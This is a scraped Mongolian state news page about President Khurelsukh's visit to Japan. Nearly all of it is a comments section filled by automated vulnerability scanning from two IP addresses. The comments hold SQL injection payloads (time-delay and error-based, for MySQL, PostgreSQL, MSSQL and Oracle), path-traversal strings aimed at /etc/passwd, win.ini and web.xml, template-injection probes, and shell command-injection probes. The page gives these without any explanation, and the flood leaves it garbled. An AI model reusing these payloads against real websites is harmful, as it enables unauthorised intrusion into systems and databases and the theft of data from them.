Монгол Улсын Ерөнхийлөгч У.Хүрэлсүх Япон улсад хийсэн айлчлалын үр дүн

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-03 22:33:02
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin 185.234.72.114 53 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',19)='w
 • admin 185.234.72.114 53 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
 • admin 185.234.72.114 53 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('l',19)
 • admin 185.234.72.114 53 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('l',0)
 • admin 185.234.72.114 53 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:19
 • admin 185.234.72.114 53 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 53 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:19'/**/
 • admin 185.234.72.114 53 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 53 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(19))::text>'0
 • admin 185.234.72.114 53 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(19))>0/**/
 • ../../../../WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456"and(select*from(select+sleep(19))a/**/union/**/select+1)="
 • ../../../WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and(select*from(select+sleep(19))a/**/union/**/select+1)='
 • ../../WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ../WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  (select*from(select+sleep(19)union/**/select+1)a)
 • ../WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • WEB-INF/web.xml;admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456"and"f"="f
 • WEB-INF/web.xml 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456"and"d"="d
 • admin 185.234.72.114 53 өдөр

  123456'and'x'='q
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and'i'='i
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and+4=7
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and+3=3
 • ./../../../../../../Windows/win.ini 185.234.72.114 53 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 53 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 53 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 53 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 53 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 53 өдөр

  123456
 • admin'"\( 185.234.72.114 53 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 53 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 53 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 53 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1144051807')))>'0 185.234.72.114 53 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 53 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1447337044'))) 185.234.72.114 53 өдөр

  123456
 • admin/**/and/**/cast(md5('1368591832')as/**/int)>0 185.234.72.114 53 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1269117020)as/**/int))>'0 185.234.72.114 53 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1420036321))) 185.234.72.114 53 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1972058905)))and" 185.234.72.114 53 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 53 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',19)='x 185.234.72.114 53 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1378717451)))and' 185.234.72.114 53 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',0)='a 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'"\(
 • admin'and(select+1)>0waitfor/**/delay'0:0:19 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456鎈'"\(
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1698218635')))>'0
 • admin'/**/and(select'1'from/**/pg_sleep(19))::text>'0 185.234.72.114 53 өдөр

  123456
 • <%- 896359080+933848031 %> 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1752167470')))
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456/**/and/**/cast(md5('1871515838')as/**/int)>0
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 53 өдөр

  123456
 • #set($c=906863381+817580322)${c}$c 185.234.72.114 53 өдөр

  123456
 • admin"and(select*from(select+sleep(19))a/**/union/**/select+1)=" 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and(select'1'from/**/cast(md5(1991089105)as/**/int))>'0
 • ${(985942940+972503690)?c} 185.234.72.114 53 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 53 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  extractvalue(1,concat(char(126),md5(1748006770)))
 • admin'and(select*from(select+sleep(19))a/**/union/**/select+1)=' 185.234.72.114 53 өдөр

  123456
 • ${804169937+933612331} 185.234.72.114 53 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 53 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1472530401)))and"
 • admin 185.234.72.114 53 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 53 өдөр

  123456
 • /*1*/{{951930477+822915345}} 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1482150251)))and'
 • admin 185.234.72.114 53 өдөр

  <%- 842294629+854409444 %>
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 53 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 53 өдөр

  123456
 • admin"and"v"="r 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  #set($c=841372184+960635431)${c}$c
 • /etc/passwd 185.234.72.114 53 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  ${(851100141+864682092)?c}
 • expr 800927926 + 880426835 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  ${848110266+914901817}
 • admin&set /A 879797497+945630635 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  /*1*/{{967131053+909601280}}
 • admin$(expr 867864021 + 825423017) 185.234.72.114 53 өдөр

  123456
 • '-var_dump(md5(217956200))-' 185.234.72.114 53 өдөр

  123456
 • admin"and"r"="r 185.234.72.114 53 өдөр

  123456
 • ${@var_dump(md5(808084547))}; 185.234.72.114 53 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 53 өдөр

  123456
 • admin|expr 873304946 + 808048146 185.234.72.114 53 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 53 өдөр

  123456
 • xwrsbzidbkyxledlbals 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  '-var_dump(md5(799586957))-'
 • admin'and'h'='s 185.234.72.114 53 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 53 өдөр

  123456
 • admin expr 990738022 + 939854402 185.234.72.114 53 өдөр

  123456
 • admin'and'k'='k 185.234.72.114 53 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  xwrsbzidbkyxledlbals
 • admin 185.234.72.114 53 өдөр

  ${@var_dump(md5(824203475))};
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  expr 856967336 + 899058686
 • admin 185.234.72.114 53 өдөр

  123456&set /A 944116658+883393798
 • admin 185.234.72.114 53 өдөр

  123456
 • ${847030043+839896868} 185.234.72.114 53 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456$(expr 910239395 + 820656623)
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456|expr 812696809 + 930653173
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  ${829337322+939945793}
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 185.234.72.114 53 өдөр

  123456 expr 913280708 + 927090282
 • admin 185.234.72.114 53 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',12)='m
 • admin 194.163.191.42 54 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',0)='w
 • admin 194.163.191.42 54 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('x',12)
 • admin 194.163.191.42 54 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('d',0)
 • admin 194.163.191.42 54 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:12
 • admin 194.163.191.42 54 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 54 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:12'/**/
 • admin 194.163.191.42 54 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 54 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(12))::text>'0
 • admin 194.163.191.42 54 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 54 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(12))>0/**/
 • admin 194.163.191.42 54 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 54 өдөр

  123456"and(select*from(select+sleep(12))a/**/union/**/select+1)="
 • admin 194.163.191.42 54 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 54 өдөр

  123456'and(select*from(select+sleep(12))a/**/union/**/select+1)='
 • admin 194.163.191.42 54 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 54 өдөр

  (select*from(select+sleep(12)union/**/select+1)a)
 • admin 194.163.191.42 54 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 54 өдөр

  123456"and"i"="c
 • admin 194.163.191.42 54 өдөр

  123456"and"f"="f
 • admin 194.163.191.42 54 өдөр

  123456'and'g'='d
 • admin 194.163.191.42 54 өдөр

  123456'and'f'='f
 • admin 194.163.191.42 54 өдөр

  123456/**/and+4=7
 • admin 194.163.191.42 54 өдөр

  123456/**/and+4=4
 • admin 194.163.191.42 54 өдөр

  123456'"\(
 • admin 194.163.191.42 54 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 54 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1552115552')))>'0
 • admin 194.163.191.42 54 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1304675946')))
 • admin 194.163.191.42 54 өдөр

  123456/**/and/**/cast(md5('1668213033')as/**/int)>0
 • admin 194.163.191.42 54 өдөр

  123456'and(select'1'from/**/cast(md5(1068600225)as/**/int))>'0
 • admin 194.163.191.42 54 өдөр

  extractvalue(1,concat(char(126),md5(1287662199)))
 • admin 194.163.191.42 54 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1530588125)))and"
 • admin 194.163.191.42 54 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1085887319)))and'
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',12)='p 194.163.191.42 54 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',0)='r 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  <%- 956755660+853266826 %>
 • admin'and(select+1)>0waitfor/**/delay'0:0:12 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  #set($c=911189637+847830764)${c}$c
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 54 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(12))::text>'0 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  ${(823775159+976733665)?c}
 • admin 194.163.191.42 54 өдөр

  ${856611316+959353793}
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 54 өдөр

  123456
 • admin'"\( 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  /*1*/{{812097532+971807649}}
 • expr 807679729 + 899394371 194.163.191.42 54 өдөр

  123456
 • admin"and(select*from(select+sleep(12))a/**/union/**/select+1)=" 194.163.191.42 54 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 54 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 54 өдөр

  123456
 • admin'and(select*from(select+sleep(12))a/**/union/**/select+1)=' 194.163.191.42 54 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 54 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1603897506')))>'0 194.163.191.42 54 өдөр

  123456
 • admin&set /A 982942052+980903679 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1923874193'))) 194.163.191.42 54 өдөр

  123456
 • admin$(expr 947093146 + 875105028) 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • admin|expr 848561755 + 973176973 194.163.191.42 54 өдөр

  123456
 • admin/**/and/**/cast(md5('1051538946')as/**/int)>0 194.163.191.42 54 өдөр

  123456
 • admin"and"t"="l 194.163.191.42 54 өдөр

  123456
 • admin expr 839499268 + 972313430 194.163.191.42 54 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1576117226)as/**/int))>'0 194.163.191.42 54 өдөр

  123456
 • admin"and"l"="l 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  expr 864256162 + 961605219
 • admin'and'z'='m 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456&set /A 928263082+975817415
 • '-var_dump(md5(643522423))-' 194.163.191.42 54 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1784425044))) 194.163.191.42 54 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1383494831)))and" 194.163.191.42 54 өдөр

  123456
 • ${@var_dump(md5(633765625))}; 194.163.191.42 54 өдөр

  123456
 • <%- 874471190+973146619 %> 194.163.191.42 54 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1363350928)))and' 194.163.191.42 54 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 54 өдөр

  123456
 • #set($c=807758760+847513248)${c}$c 194.163.191.42 54 өдөр

  123456
 • admin'and'z'='z 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  '-var_dump(md5(714841836))-'
 • admin 194.163.191.42 54 өдөр

  123456$(expr 863342080 + 846704264)
 • admin 194.163.191.42 54 өдөр

  123456
 • ${(908170316+872297451)?c} 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • ${868995370+924977714} 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456|expr 882622775 + 871947666
 • ${805950707+835865863} 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  ${@var_dump(md5(935891149))};
 • admin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  ${961795482+963232515}
 • admin 194.163.191.42 54 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • /*1*/{{988019745+959451807}} 194.163.191.42 54 өдөр

  123456
 • ukcgxpvczbztnsoxhsik 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456
 • admin 194.163.191.42 54 өдөр

  123456 expr 987093198 + 941966852
 • admin 194.163.191.42 54 өдөр

  ukcgxpvczbztnsoxhsik
 • admin 194.163.191.42 54 өдөр

  123456